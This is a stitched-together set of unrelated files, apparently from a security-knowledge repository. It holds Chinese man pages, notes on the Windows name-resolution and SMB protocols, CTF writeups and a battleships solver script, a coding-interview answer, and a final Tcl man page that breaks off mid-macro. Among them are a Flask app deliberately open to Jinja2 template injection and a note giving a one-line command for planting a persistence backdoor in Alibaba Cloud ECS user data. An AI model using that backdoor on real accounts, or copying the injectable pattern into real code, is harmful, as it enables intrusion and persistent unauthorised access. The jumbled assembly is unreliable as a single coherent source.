.\" Copyright 1992, 1993 Rickard E. Faith (faith@cs.unc.edu) .\" May be distributed under the GNU General Public License .\" Changes from sct@dcs.ed.ac.uk added Sat Oct 9 09:54:00 1993. .TH RDEV 8 "20 November 1993" "Linux 0.99" "Linux Programmer's Manual" .SH NAME rdev \- 查询/设置内核映像文件的根设备,RAM 磁盘大小或视频模式 .SH 总览 SYNOPSIS .nf .BR "rdev [ \-rvh ] [ \-o " offset " ] [ " image " [ " value " [ " offset " ] ] ]" .BR "rdev [ \-o " offset " ] [ " image " [ " root_device " [ " offset " ] ] ]" .BR "ramsize [ \-o " offset " ] [ " image " [ " size " [ " offset " ] ] ]" .BR "vidmode [ \-o " offset " ] [ " image " [ " mode " [ " offset " ] ] ]" .BR "rootflags [ \-o " offset " ] [ " image " [ " flags " [ " offset " ] ] ]" .fi .SH 描述 DESCRIPTION 不带任何参数的 .B rdev 命令将输出当前根文件系统的 .I /etc/mtab 文件行。不带任何参数的 .BR ramsize ", " vidmode ", 和 " rootflags 将显示帮助信息。 在一个 i386 上的 linux 可引导内核映像文件中,有几对字节用来指定根设备,视频模式和 RAM 磁盘的大小。这些字节对,在默认情况下起始在内核映像的偏移量504 (十进制) 处。 .nf .RS 498 Root flags (根标志) (500 和 502 保留) 504 RAM Disk Size RAM (磁盘大小) 506 VGA Mode (VGA 模式) 508 Root Device (根设备) (510 Boot Signature (启动标记)) .RE .fi .B rdev 可以改变这些值。 典型的 .I image 参数的值是一个可启动的 linux 内核映像,可能是 .nf .RS /vmlinux /vmunix /boot/bzImage-2.4.0 /dev/fd0 /dev/fd1 .RE .fi 当使用 .B rdev 命令时, .I root_device 参数是类似如下所示的值: .nf .RS /dev/hda1 /dev/hdf13 /dev/sda2 /dev/sdc4 /dev/ida/c0d0p1 .RE .fi 也可以通过使用一个逗号 (comma) 分隔的十进制整数对 .IR major , minor 来指定这个设备。 对于 .B ramsize 命令, .B size 参数指定了 RAM 磁盘的大小,以千字节为单位。 对于 .B rootflags 命令, .B flags 参数包含在挂载 root 文件系统时额外的信息。当前这些标志的唯一作用是当 .B flags 非零时,强制内核以只读模式来挂载 root 文件系统。 对于 .B vidmode 命令, .B mode 参数指定了视频模式。 .nf .RS -3 = Prompt (提示) -2 = Extended VGA (扩展的VGA) -1 = Normal VGA (普通VGA) 0 = as if "0" was pressed at the prompt (假设在提示时按下了"0") 1 = as if "1" was pressed at the prompt 2 = as if "2" was pressed at the prompt n = as if "n" was pressed at the prompt .RE .fi 如果没有指定 .I value ,将检测 .I image 来得到当前的设置。 .SH 选项 OPTIONS .TP .B \-r 使得 .B rdev 作为 .BR ramsize 运行。 .TP .B \-R 使得 .B rdev 作为 .BR rootflags 运行。 .TP .B \-v 使得 .B rdev 作为 .BR vidmode 运行。 .TP .B \-h 提供帮助。 .SH BUGS .B rdev 工具,如果不是用做查找当前根设备的名称,那么就是一种古老的破解 (hack) ,依靠对内核的一个特定 (magic) 位移以特殊 (magic) 数字进行修改来工作。它在 i386 之外的体系中不能工作。不鼓励使用它。使用一个启动管理器,例如 SysLinux , LILO 或者 grub 来替代它。 .SH 历史 HISTORY 偏移 502 从前是交换设备的设备号 (在 linux 0.12 中),运行 \fI"rdev -s"\fR 或者 \fI"swapdev"\fR 将设置它。但是,从 linux 0.95 起,这个常量不再使用,交换设备是以 .IR swapon () 系统调用来指定的。 .SH 作者 AUTHORS .nf 原作者是 Werner Almesberger (almesber@nessie.cs.id.ethz.ch); Peter MacDonald (pmacdona@sanjuan.UVic.CA) 进行了修改; Stephen Tweedie (sct@dcs.ed.ac.uk) 加入了 rootflags 支持。 .fi .SH "[中文版维护人]" .B 所罗门 <solomen@email.com.cn> .SH "[中文版最新更新]" .B Nov 21 2000 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
'\" '\" Copyright (c) 1994 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: bell.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: bell.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 4c 8c 12c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH bell 3tk 4.0 Tk "Tk Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME bell \- 鸣响一个显示器的震铃 .SH 总览 SYNOPSIS \fBbell \fR?\fB\-displayof \fIwindow\fR? .BE .SH 描述 DESCRIPTION .PP 这个命令鸣响 \fIwindow\fR 所在的显示器的震铃并返回一个空串。如果省略了 \fB\-displayof\fR 选项,缺省使用应用的主窗口的显示器。这个命令使用给这个显示器的有关震铃的当前设置,可以使用程序如 \fBxset\fR 来修改这个设置。 .PP 这个命令还重置给这个屏幕的屏幕保护器(screen saver)。一些屏幕保护器(程序)忽略这个重置,而另一些将重置而屏幕再次变为可见。 .SH 关键字 KEYWORDS beep, bell, ring .SH [中文版维护人] .B 寒蝉退士 .SH [中文版最新更新] .B 2001/09/28 .SH 《中国 Linux 论坛 man 手册页翻译计划》: .B http://cmpp.linuxforum.net
sec-knowleage
# 协议 --- ## LLMNR 链路本地多播名称解析(LLMNR)是一个基于域名系统(DNS)数据包格式的协议,IPv4 和 IPv6 的主机可以通过此协议对同一本地链路上的主机执行名称解析。Windows 操作系统从 Windows Vista 开始就内嵌支持,Linux 系统也通过 systemd 实现了此协议。它通过 UDP 5355 端口进行通信,且 LLMNR 支持 IPV6。 LMNR 进行名称解析的过程为: 1. 检查本地 NetBIOS 缓存 2. 如果缓存中没有则会像当前子网域发送广播 3. 当前子网域的其他主机收到并检查广播包,如果没有主机响应则请求失败 --- ## NBNS 网络基本输入 / 输出系统 (NetBIOS) 名称服务器 (NBNS) 协议是 TCP/IP 上的 NetBIOS (NetBT) 协议族的一部分,它在基于 NetBIOS 名称访问的网络上提供主机名和地址映射方法。通过 UDP 137 端口进行通信,但 NBNS 不支持 IPV6。 NetBIOS 协议进行名称解析的过程如下: 1. 检查本地 NetBIOS 缓存 2. 如果缓存中没有请求的名称且已配置了 WINS 服务器,接下来则会向 WINS 服务器发出请求 3. 如果没有配置 WINS 服务器或 WINS 服务器无响应则会向当前子网域发送广播 4. 如果发送广播后无任何主机响应则会读取本地的 lmhosts 文件 5. lmhosts 文件位于 C:\Windows\System32\drivers\etc \ 目录中。 --- ## mdns 在计算机网络中,多播 DNS( mDNS )协议将主机名解析为不包含本地名称服务器的小型网络中的 IP 地址。它是一种零配置服务,使用与单播域名系统(DNS)基本相同的编程接口,数据包格式和操作语义。虽然 Stuart Cheshire 将 mDNS 设计为独立协议,但它可以与标准 DNS 服务器协同工作。它通过 UDP 5353 端口进行通信,且 MDNS 也支持 IPV6。 目前仅有 windows 10 支持 mdns 经测试发现,禁用了 llmnr 后 mdns 也会被禁用。 --- ## SMB **SMB 有哪些版本** - SMB 1.0 (or SMB1) - The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2 - SMB 2.0 (or SMB2) - The version used in Windows Vista (SP1 or later) and Windows Server 2008 - SMB 2.1 (or SMB2.1) - The version used in Windows 7 and Windows Server 2008 R2 - SMB 3.0 (or SMB3) - The version used in Windows 8 and Windows Server 2012 从 Windows 95 开始,Microsoft Windows 操作系统支持 SMB 协议 ,但是由于 SMB 由于有漏洞。所以在 Windows Vista 之后,Windows 开始使用 SMB2 协议。也就是自 Vista 之后的 WIN7、Windows Server 2008 等都是用的 SMB2 协议。而 Windows XP 和 Windows Server2003 及其之前的机器都是用的 SMB1.0 协议。 SMB 协议支持直接运行在 TCP 上或封装运行在 NetBIOS 协议上,Psexec 的 SMB 协议就是直接运行在 TCP 上,而 net use 命令的抓包就是运行在 NetBIOS 协议。 在 WindowsNT 中,SMB 除了基于 NBT 实现,还可以直接通过 445 端口实现。 对于 WinNT 客户端(发起端)来说: - 如果在允许 NBT 的情况下连接服务器时,客户端会同时尝试访问 139 和 445 端口,如果 445 端口有响应,那么就发送 RST 包给 139 端口断开连接,用 455 端口进行会话,当 445 端口无响应时,才使用 139 端口,如果两个端口都没有响应,则会话失败; - 如果在禁止 NBT 的情况下连接服务器时,那么客户端只会尝试访问 445 端口,如果 445 端口无响应,那么会话失败。 对于 winNT 服务器端来说: - 如果允许 NBT, 那么 UDP 端口 137、138,TCP 端口 139,445 将开放; - 如果禁止 NBT,那么只有 445 端口开放。 **TCP 139、445 端口** 139 和 445 端口的通信过程是通过 SMB(服务器信息块)协议实现的。即根据 DNS 服务器中的名字列表信息,寻找需要通信的对象。如果顺利地得到对象的 IP 地址,就可以访问共享资源 。Windows 2000 以前版本的 Windows 使用 NetBIOS 协议解决各计算机名的问题。通过向 WINS 服务器发送通信对象的 NetBIOS 名,取得 IP 地址。而 Windows2000 以后的版本所采用的 CIFS 则利用 DNS 解决计算机的命名问题。 在 SMB 通信中,首先要取得通信对象的 IP 地址,然后向通信对象发出开始通信的请求。如果对方充许进行通信,就会确立会话层(Session)。并使用它向对方发送用户名和密码信息,进行认证。如果认证成功,就可以访问对方的共享文件。在这些一连串的通信中使用的就是 139 端口。 除此之外,Windows 2000 以后的系统还使用 445 端口。文件共享功能本身与 139 端口相同,但该端口使用的是与 SMB 不同的协议。这就是在 Windows 2000 中最新使用的 CIFS(通用因特网文件系统)协议。CIFS 和 SMB 解决计算机名的方法不同。SMB 使用 NetBIOS 和 WINS 解决计算机名,而 CIFS 则使用 DNS。当 139 和 445 端口同时打开的话,网络文件共享优先使用 445 端口。当 445 端口关闭时,网络文件共享使用 139 端口。但是自从 win10 开始,文件共享只使用 445 端口,445 端口关闭的话,则不能使用文件共享服务。因此,在文件服务器和打印服务器使用 Windows 的公司内部网络环境中,就无法关闭 139 和 445 端口。 在默认设置下,Windows 会开放提供文件共享服务的 TCP 139 号端口。一旦文件共享服务启动,系统就会进入等待状态。而共享资源则可以利用 net 命令轻松地进行分配。尽管 C 盘如果没有管理员权限就无法共享,但如果不经意地将 Guest 帐号设置为有效以后,攻击者就能够访问 C 盘,非常轻松地破坏硬盘。如果客户端使用 Windows 2000 以上系统构成的网络,自身不公开文件,就可以关闭这两个端口。这是因为如前所述,该网络只用 445 端口就能够进行文件共享。由于在解决计算机名过程中使用 DNS,所以也可以关闭 137 和 138 端口。而在很多情况下,文件共享和打印机共享在普通的业务中必须使用 139 端口通过 SMB 协议进行通信,因此就无法关闭 139 端口。另外,浏览时还需要 137~139 端口。 --- ## Source & Reference - [Windows系统安全|135、137、138、139和445端口](https://mp.weixin.qq.com/s/UlNnDh2fqBZXwtEinCEnQA)
sec-knowleage
# Writeup CTFZone 2017 Quals Team: akrasuski1, msm, nazywam, rev, c7f.m0d3, cr019283, shalom ![](ctfzone.png) ### Table of contents * [battleships (ppc / re)](battleships) * [crackme3000 (re)](crackme3000) * [decrypt_the_undecryptable (re)](decrypt_the_undecryptable) * [fireplace (re)](fireplace) * [paged_out (misc/forensics)](paged_out) * [mprsa (crypto)](mprsa)
sec-knowleage
# milktea, re In this task we got quite obfuscated, though small, binary. It asked for a password and checked whether it is correct. As an easy to overlook obfuscation, it patched its GOT `memcmp` entry to point to a custom function, which actually checks whether `arg1 == arg2 ^ const_buf`. Other than that, the reverse engineering boiled down to simplifying as many expressions from the executed statements as possible. In the end, most of them turned out to be xors with constants, which eventually cancelled out to zero. The final encryption code was quite simple and fit in a few lines of C code. All operations were invertible, so we wrote the decryption function, which yielded the flag. The whole solution code is available in `doit.cpp`.
sec-knowleage
# 45. 把数组排成最小的数 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/8fecd3f8ba334add803bf2a06af1b993?tpId=13&tqId=11185&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 输入一个正整数数组,把数组里所有数字拼接起来排成一个数,打印能拼接出的所有数字中最小的一个。例如输入数组 {3,32,321},则打印出这三个数字能排成的最小数字为 321323。 ## 解题思路 可以看成是一个排序问题,在比较两个字符串 S1 和 S2 的大小时,应该比较的是 S1+S2 和 S2+S1 的大小,如果 S1+S2 \< S2+S1,那么应该把 S1 排在前面,否则应该把 S2 排在前面。 ```java public String PrintMinNumber(int[] numbers) { if (numbers == null || numbers.length == 0) return ""; int n = numbers.length; String[] nums = new String[n]; for (int i = 0; i < n; i++) nums[i] = numbers[i] + ""; Arrays.sort(nums, (s1, s2) -> (s1 + s2).compareTo(s2 + s1)); String ret = ""; for (String str : nums) ret += str; return ret; } ```
sec-knowleage
.TH ZDROT 3 .SH NAME ZDROT \- ZDROT .SH "总览 SYNOPSIS" .TP 18 SUBROUTINE ZDROT( N, CX, INCX, CY, INCY, C, S ) .TP 18 .ti +4 INTEGER INCX, INCY, N .TP 18 .ti +4 DOUBLE PRECISION C, S .TP 18 .ti +4 COMPLEX*16 CX( * ), CY( * ) .TP 18 .ti +4 INTEGER I, IX, IY .TP 18 .ti +4 COMPLEX*16 CTEMP .TP 18 .ti +4 IF( N.LE.0 ) RETURN .TP 18 .ti +4 IF( INCX.EQ.1 .AND. INCY.EQ.1 ) GO TO 20 .TP 18 .ti +4 IX = 1 .TP 18 .ti +4 IY = 1 .TP 18 .ti +4 IF( INCX.LT.0 ) IX = ( -N+1 )*INCX + 1 .TP 18 .ti +4 IF( INCY.LT.0 ) IY = ( -N+1 )*INCY + 1 .TP 18 .ti +4 DO 10 I = 1, N .TP 18 .ti +4 CTEMP = C*CX( IX ) + S*CY( IY ) .TP 18 .ti +4 CY( IY ) = C*CY( IY ) - S*CX( IX ) .TP 18 .ti +4 CX( IX ) = CTEMP .TP 18 .ti +4 IX = IX + INCX .TP 18 .ti +4 IY = IY + INCY .TP 18 .ti +4 10 CONTINUE .TP 18 .ti +4 RETURN .TP 18 .ti +4 20 CONTINUE .TP 18 .ti +4 DO 30 I = 1, N .TP 18 .ti +4 CTEMP = C*CX( I ) + S*CY( I ) .TP 18 .ti +4 CY( I ) = C*CY( I ) - S*CX( I ) .TP 18 .ti +4 CX( I ) = CTEMP .TP 18 .ti +4 30 CONTINUE .TP 18 .ti +4 RETURN .TP 18 .ti +4 END .SH PURPOSE .SH "[中文版维护人]" .B 姓名 <email> .SH "[中文版最新更新]" .B yyyy.mm.dd .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
from rc4 import RC4 from pwn import * import sys, hashlib, string def find(a, b): alph = string.letters+string.digits for x1 in alph: for x2 in alph: for x3 in alph: for x4 in alph: s=a+x1+x2+x3+x4 sh=hashlib.sha256(s).hexdigest() if sh == b: return s key="g\306isQ\377J\354)\315\272\253\362\373\343F|\302T\370\33\350\347\215vZ.c3\237\311\232f2\r\2671X\243Z%]\5\27X\351^\324\253\262\315\306\233\264T\21\16\202tA!=\334\207p\351>\241A\341\374g>\1~\227\352\334k\226\2178\\*\354\260;\3732\257<T\354\30\333\\\2\32\376C\373\372\252:\373)\321\346\5<|\224u\330\276a\211\371\\\273\250\231\17\225\261\353\361\263\5\357\367\0\351\241:\345\312\v\313\320HGd\275\37#\36\250\34{d\305\24sZ\305^Kyc;pd$\21\236\t\334\252\324\254\362\33\20\257;3\315\343PHG\25\\\273o\"\31\272\233}\365\v\341\32\34\177#\370)\370\244\33\23\265\312N\350\23028\340yM=4\274_Nw\372\313l\5\254\206!+\252\32U\242\276p\265s;\4\\\3236\224\263\257\342\360\344\236O2\25I\375\202N\251" rem = remote("82.202.212.28", 1337) a = rem.recvline() a = a.split("'")[1].split("*")[0] b = rem.recvline().split("= ")[1].strip() c = find(a, b) rem.send(c) rem.recvuntil("OK") rem.send("CLIENT_HELLO\0"+key) key=[ord(c) for c in key] r = RC4(key) def cry(a): s = "" for c,d in zip(a, r): s+=chr(ord(c) ^ d) return s print cry(rem.recv()) rem.send(cry("PvQvRvSvTvUvVvWvXvYv")) print cry(rem.recv()) shot = {} k=0 hit=0 mis=0 X=14 Y=7 while True: times=0 while True: x = random.randint(0, X-1) y = random.randint(0, Y-1) if (x,y) not in shot: break else: times+=1 if times>10000 and shot[(x,y)] == 'v': break rem.send(cry("SHOOT" + chr(x*16+y))) q = cry(rem.recv()) print q if "WIN" in q: open("/tmp/loggg", "a").write("hurra %s %d/%d\n" %(q,hit,hit+mis)) rem.interactive() elif "MIS" in q: shot[(x,y)] = "." mis+=1 else: def do(a,b,c='o'): global mis if a>=0 and a<=X and b>=0 and b<=Y: if (a,b) not in shot: shot[(a,b)] = c mis+=1 do(x-1, y) do(x+1, y) do(x, y-1) do(x, y+1) if 0: do(x-1, y-1, 'v') do(x+1, y+1, 'v') do(x+1, y-1, 'v') do(x-1, y+1, 'v') shot[(x,y)] = "x" hit+=1 rem.send(cry("NEXT")) x=cry(rem.recv()) print x if "LOS" in x: open("/tmp/loggg", "a").write("%d/%d\n" %(hit,hit+mis)) break print len(shot) for i in range(X): for j in range(Y): if (i,j) not in shot: print " ", else: print shot[(i,j)], print
sec-knowleage
'\" t .TH "NSS\-MYMACHINES" "8" "" "systemd 231" "nss-mymachines" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" nss-mymachines, libnss_mymachines.so.2 \- 提供了解析本地容器名称的功能 .SH "SYNOPSIS" .PP libnss_mymachines\&.so\&.2 .SH "描述" .PP \fBnss\-mymachines\fR 是一个 \fBglibc\fR(GNU C Library) NSS(Name Service Switch) 插件, 提供了本地容器名称的解析功能。 \fBsystemd-machined.service\fR(8) 服务 按照本地容器所属 scope 的顺序, 在这些本地容器的名称与其IP地址之间建立对应关系。 该功能仅可用于使用了网络名字空间(network namespace)的容器。 .PP 该模块还可以为使用了用户名字空间(user namespace)的容器提供解析 UID/GID 与用户名/组名之间对应关系的功能。 .PP 要激活NSS模块,可将 "mymachines" 添加到 /etc/nsswitch\&.conf 文件中以 "hosts:", "passwd:", "group:" 开头的行里面。 .PP 建议将 "mymachines" 放置在 /etc/nsswitch\&.conf 文件中 紧跟 "files" 或 "compat" 项之后,以确保在解析时,本地映射文件 /etc/hosts, /etc/passwd, /etc/group 仍为最优先, 同时又将其他解析方式(DNS之类)作为后备。 .SH "例子" .PP 下面是一个正确开启了 \fBnss\-mymachines\fR 插件的 /etc/nsswitch\&.conf 文件的例子: .sp .if n \{\ .RS 4 .\} .nf passwd: compat \fBmymachines\fR group: compat \fBmymachines\fR shadow: compat hosts: files \fBmymachines\fR resolve myhostname networks: files protocols: db files services: db files ethers: db files rpc: db files netgroup: nis .fi .if n \{\ .RE .\} .SH "参见" .PP \fBsystemd\fR(1), \fBsystemd-machined.service\fR(8), \fBnss-resolve\fR(8), \fBnss-myhostname\fR(8), \fBnsswitch.conf\fR(5), \fBgetent\fR(1) .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
sec-knowleage
from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __name__ == "__main__": app.run()
sec-knowleage
--- title: 用户数据后门 --- ## 在阿里云上一键创建用户数据后门 由于在实例启动时,会执行用户数据中的内容,因此通过往用户数据中写入文件,可以起到后门的作用。 现在使用以下命令,就可以修改阿里云实例中的用户数据,这样当实例重启时就会执行该命令了。 ```bash cf alibaba ecs exec --userDataBackdoor "whoami" ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = "2023 年 7 月 1 日" } } </script>
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: llength.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: llength.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if 